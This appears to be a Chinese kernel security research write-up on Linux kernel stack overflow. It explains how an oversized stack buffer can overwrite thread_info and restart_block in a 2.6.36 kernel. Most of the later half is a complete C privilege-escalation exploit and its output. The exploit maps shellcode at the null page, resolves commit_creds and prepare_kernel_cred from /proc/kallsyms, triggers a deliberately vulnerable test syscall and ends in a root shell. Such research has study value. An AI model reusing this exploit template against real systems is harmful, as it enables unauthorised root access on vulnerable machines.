|  | Linux内核安全研究之Stack Overflow溢出 by wzt        <wzt.wzt@gmail.com> 一、背景:
 
 Stack overflow与我之前发过的Stack buffer overflow是两个不同的概念, 它们都是发生在内核stack中的溢出。
 Jon Oberheide在他的blog中提到了一种新的stack overflow溢出攻击方式, 大致说了下溢出原理,没给出poc,我尝试研究了一下,
 把这几天的调试方法总结下。
 
 二、理解内核堆栈:
 
 当user space的程序通过int 0x80进入内核空间的时候,CPU自动完成一次堆栈切换, 从user space的stack切换到kernel space的stack。
 在这个进程exit之前所发生的所有系统调用所使用的kernel stack都是同一个。kernel stack的大小一般为4096/8192,我画了个内核堆栈示意图帮助大家理解:
 
 内存低址                                                              内存高址
 |                 |<-----------------------------esp|
 +-----------------------------------4096-------------------------------+
 |        72        |     4           |       x < 4016    |     4       |
 +------------------+-----------------+---------------------------------+
 |thread_info  |    | STACK_END_MAGIC |   var/call chain  |stack_canary |
 +------------------+-----------------+---------------------------------+
 |     28      | 44 |                 |                                 |
 V    |                                                   |
 restart_block                                                V
 
 esp+0x0                                                                   +0x40
 +---------------------------------------------------------------------------+
 |ebx|ecx|edx|esi|edi|ebp|eax|ds|es|fs|gs|orig_eax|eip|cs|eflags|oldesp|oldss|
 +---------------------------------------------------------------------------+
 |             kernel完成                          |         cpu自动完成       |
 
 
 在老的内核中, 用struct task_struct来描述一个进程结构, 在新的内核里, task_struct结构又被包装在struct thread_info里:
 struct thread_info {
 struct task_struct      *task;          /* main task structure */
 struct exec_domain      *exec_domain;   /* execution domain */
 __u32                   flags;          /* low level flags */
 __u32                   status;         /* thread synchronous flags */
 __u32                   cpu;            /* current CPU */
 int                     preempt_count;  /* 0 => preemptable,
 <0 => BUG */
 mm_segment_t            addr_limit;
 struct restart_block    restart_block;
 void __user             *sysenter_return;
 #ifdef CONFIG_X86_32
 unsigned long           previous_esp;   /* ESP of the previous stack in
 case of nested (IRQ) stacks
 */
 __u8                    supervisor_stack[0];
 #endif
 int                     uaccess_err;
 };
 它的第一个字段就指向当前进程的task_stuct指针, 注意是指针, 而不是一个结构体,task_struct在我的2.6.36.2内核中的大小是1196字节,而thread_info
 大小为72字节, 所以保存一个指针将会非常节省内核堆栈的使用。 因为thread_info和stack是仅挨在一起的, 看如下代码:
 #define alloc_thread_info(tsk)                                          \
 ((struct thread_info *)__get_free_pages(THREAD_FLAGS, THREAD_ORDER))
 __get_free_pages根据THREAD_ORDER分配1到2个物理页面。
 
 
 三、Stack Overflow
 
 简化一下内核示意图:
 
 内存低址                                                                       内存高址
 <-esp->
 +--------------------------------------------------------------------------------+
 |      thread_info |               stack             | buff      |               |
 +--------------------------------------------------------------------------------+
 
 buff是stack中的一个变量, 如果buff越界就会发生缓冲区溢出,这是大家最熟悉的一种内核溢出方式。
 但是如果esp做减法操作,esp - x, 当x足够大的时候, thread_info的结构将会被覆盖,gcc只会按照程序设定的buffer大小来申请堆栈空间。
 
 看如下一个内核代码片段:
 
 #define BUFF_SIZE       3968
 
 asmlinkage long stack_overflow_test(char *addr, int size)
 {
 char buff[BUFF_SIZE];
 
 if (copy_from_user(buff, addr, size)) {
 return -1;
 }
 
 return 0;
 }
 我编译内核的时候,把内核堆栈设为了4096大小。 我们算下stack最多可以用多少字节:
 
 4096 - (thread_info + STACK_END_MAGIC + pt_regs) = 4096 - 72 - 4 - 68 = 3952
 
 一个stack最多用3952个字节来分配变量和call chain空间。 但是如果我把buff定义的更大一些呢, 看看stack_overflow_test的反汇编代码:
 
 000001de <stack_overflow_test>:
 1de:   53                      push   %ebx
 1df:   81 ec 80 0f 00 00       sub    $0xf80,%esp
 1e5:   8b 9c 24 8c 0f 00 00    mov    0xf8c(%esp),%ebx
 1ec:   81 fb 7e 0f 00 00       cmp    $0xf7e,%ebx
 1f2:   77 16                   ja     20a <stack_overflow_test+0x2c>
 1f4:   8b 94 24 88 0f 00 00    mov    0xf88(%esp),%edx
 1fb:   89 d9                   mov    %ebx,%ecx
 1fd:   8d 44 24 02             lea    0x2(%esp),%eax
 201:   e8 fc ff ff ff          call   202 <stack_overflow_test+0x24>
 206:   89 c3                   mov    %eax,%ebx
 208:   eb 05                   jmp    20f <stack_overflow_test+0x31>
 20a:   e8 fc ff ff ff          call   20b <stack_overflow_test+0x2d>
 20f:   83 fb 01                cmp    $0x1,%ebx
 212:   19 c0                   sbb    %eax,%eax
 214:   81 c4 80 0f 00 00       add    $0xf80,%esp
 21a:   5b                      pop    %ebx
 21b:   f7 d0                   not    %eax
 21d:   c3                      ret
 
 sub    $0xf80,%esp, gcc仍然会分配3968字节。当copy_from_user发生的时候, 会直接把user space下的数据覆盖thread_info结构。
 
 四、攻击方法:
 
 既然我们可以控制user space下的数据来覆盖thread_info, 那么只要在thread_info结构中找出一个函数指针, 覆盖它,而且在user space下可以又可以调用,
 那么将会完成一次权限提升的操作。thread_info结构里有个restart_block结构:
 
 include/linux/thread_info.h:
 
 /*
 * System call restart block.
 */
 struct restart_block {
 long (*fn)(struct restart_block *);
 union {
 struct {
 unsigned long arg0, arg1, arg2, arg3;
 };
 /* For futex_wait and futex_wait_requeue_pi */
 struct {
 u32 *uaddr;
 u32 val;
 u32 flags;
 u32 bitset;
 u64 time;
 u32 *uaddr2;
 } futex;
 /* For nanosleep */
 struct {
 clockid_t index;
 struct timespec __user *rmtp;
 #ifdef CONFIG_COMPAT
 struct compat_timespec __user *compat_rmtp;
 #endif
 u64 expires;
 } nanosleep;
 /* For poll */
 struct {
 struct pollfd __user *ufds;
 int nfds;
 int has_timeout;
 unsigned long tv_sec;
 unsigned long tv_nsec;
 } poll;
 };
 };
 
 fn是一个函数指针并且可以被user space调用:
 #endifkernel/signal.c:
 
 /*
 * System call entry points.
 */
 
 SYSCALL_DEFINE0(restart_syscall)
 {
 struct restart_block *restart = ¤t_thread_info()->restart_block;
 return restart->fn(restart);
 }
 
 现在只要控制user space下的数据覆盖restart_block指针即可。 按照这个思路调试了几天, 发现只能触发
 一些NULL pointer der的oops, restart_block始终没有被覆盖。 既然可以触发空指针引用操作, 那么也是可以间接来提权的。
 我写了个exploit用来做权限提升, restart_block的覆盖还要继续研究。
 
 /*
 * linux kernel stack overflow test exploit
 *
 * by wzt    <wzt.wzt@gmail.com>
 *
 */
 
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <limits.h>
 #include <inttypes.h>
 #include <sys/types.h>
 #include <sys/mman.h>
 #include <sys/stat.h>
 #include <sys/syscall.h>
 
 #include "syscalls.h"
 
 #define __NR_stack_overflow_test    59
 #define KALLSYMS_NAME            "/proc/kallsyms"
 #define BUFF_SIZE            4096
 
 #define USER_CS                0x73
 #define USER_SS                0x7b
 #define USER_FL                0x246
 #define STACK(x)            (x + sizeof(x) - 40)
 
 void exit_code();
 char exit_stack[1024 * 1024];
 static inline __attribute__((always_inline)) void exit_kernel();
 
 int (*kernel_printk)(const char *fmt, ...);
 
 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
 typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
 _commit_creds commit_creds;
 _prepare_kernel_cred prepare_kernel_cred;
 
 static inline my_syscall2(long, stack_overflow_test, char *, addr, int, size);
 
 int __attribute__((regparm(3)))kernel_code(int *p)
 {
 commit_creds(prepare_kernel_cred(0));
 exit_kernel();
 return -1;
 }
 
 static inline __attribute__((always_inline)) void *get_current()
 {
 unsigned long curr;
 
 __asm__ __volatile__ (
 "movl %%esp, %%eax ;"
 "andl %1, %%eax ;"
 "movl (%%eax), %0"
 : "=r" (curr)
 : "i" (~8191)
 );
 
 return (void *) curr;
 }
 
 static inline __attribute__((always_inline)) void exit_kernel()
 {
 __asm__ __volatile__ (
 "movl %0, 0x10(%%esp) ;"
 "movl %1, 0x0c(%%esp) ;"
 "movl %2, 0x08(%%esp) ;"
 "movl %3, 0x04(%%esp) ;"
 "movl %4, 0x00(%%esp) ;"
 "iret"
 ::"i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
 "i" (USER_CS), "r" (exit_code)
 );
 }
 
 void test_kernel_code(int *p)
 {
 kernel_printk = 0xc0431234;
 kernel_printk("We are in kernel.\n");
 exit_kernel();
 }
 
 void exit_code()
 {
 if (getuid() != 0) {
 fprintf(stderr, "[-] Get root failed\n");
 exit(-1);
 }
 
 printf("[+] We are root!\n");
 execl("/bin/sh", "sh", "-i", NULL);
 }
 
 
 unsigned long find_symbol_by_proc(char *file_name, char *symbol_name)
 {
 FILE *s_fp;
 char buff[200];
 char *p = NULL, *p1 = NULL;
 unsigned long addr = 0;
 
 s_fp = fopen(file_name, "r");
 if (s_fp == NULL) {
 printf("open %s failed.\n", file_name);
 return 0;
 }
 
 while (fgets(buff, 200, s_fp) != NULL) {
 if (strstr(buff, symbol_name) != NULL) {
 buff[strlen(buff) - 1] = '\0';
 p = strchr(strchr(buff, ' ') + 1, ' ');
 ++p;
 
 if (!p) {
 return 0;
 }
 if (!strcmp(p, symbol_name)) {
 p1 = strchr(buff, ' ');
 *p1 = '\0';
 sscanf(buff, "%lx", &addr);
 //addr = strtoul(buff, NULL, 16);
 printf("[+] found %s addr at 0x%x.\n",
 symbol_name, addr);
 break;
 }
 }
 }
 
 fclose(s_fp);
 return addr;
 }
 
 void setup(void)
 {
 void *payload;
 
 payload = mmap(0x0, 0x1000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
 if ((long)payload == -1) {
 printf("[*] Failed to mmap() at target address.\n");
 exit(-1);
 }
 printf("[+] mmaping kernel code at 0x%x ok.\n", payload);
 memcpy((void *)0x4, &kernel_code, 1024);
 
 printf("[+] looking for symbols...\n");
 commit_creds = (_commit_creds)
 find_symbol_by_proc(KALLSYMS_NAME, "commit_creds");
 if (!commit_creds) {
 printf("[-] not found commit_creds addr.\n");
 return ;
 }
 
 prepare_kernel_cred =
 (_prepare_kernel_cred)find_symbol_by_proc(KALLSYMS_NAME,
 "prepare_kernel_cred");
 if (!prepare_kernel_cred) {
 printf("[-] not found prepare_kernel_cred addr.\n");
 return ;
 }
 }
 
 int trigger(void)
 {
 char buff[BUFF_SIZE];
 
 printf("[+] test_kernel_code: %x\n", test_kernel_code);
 printf("[+] exit_kernel: %x\n", exit_kernel);
 printf("[+] exit_code: %x\n", exit_code);
 
 *(int *)buff = (int)test_kernel_code;
 /*
 *(int *)(buff + 4) = (int)1;
 *(int *)(buff + 8) = (int)1;
 *(int *)(buff + 12) = (int)1;
 *(int *)(buff + 16) = (int)1;
 *(int *)(buff + 20) = (int)1;
 */
 
 //memset(buff, 0x41, 32);
 stack_overflow_test(buff, 4);
 
 printf("[+] trigger restart_block fn ...\n");
 syscall(SYS_restart_syscall);
 
 return 0;
 }
 
 int main(void)
 {
 setup();
 trigger();
 
 return 0;
 }
 
 [wzt@localhost stack]$ ./exp
 [+] mmaping kernel code at 0x0 ok.
 [+] looking for symbols...
 [+] found commit_creds addr at 0xc0448f13.
 [+] found prepare_kernel_cred addr at 0xc04490f6.
 [+] test_kernel_code: 80486f2
 [+] exit_kernel: 80486c3
 [+] exit_code: 804873c
 [+] trigger restart_block fn ...
 [+] We are root!
 sh-3.2# id
 uid=0(root) gid=0(root)
 sh-3.2# uname -a
 Linux localhost.localdomain 2.6.36.2 #4 SMP Sun Jan 2 11:46:15 CST 2011 i686 i686 i386 GNU/Linux
 sh-3.2#
 
 |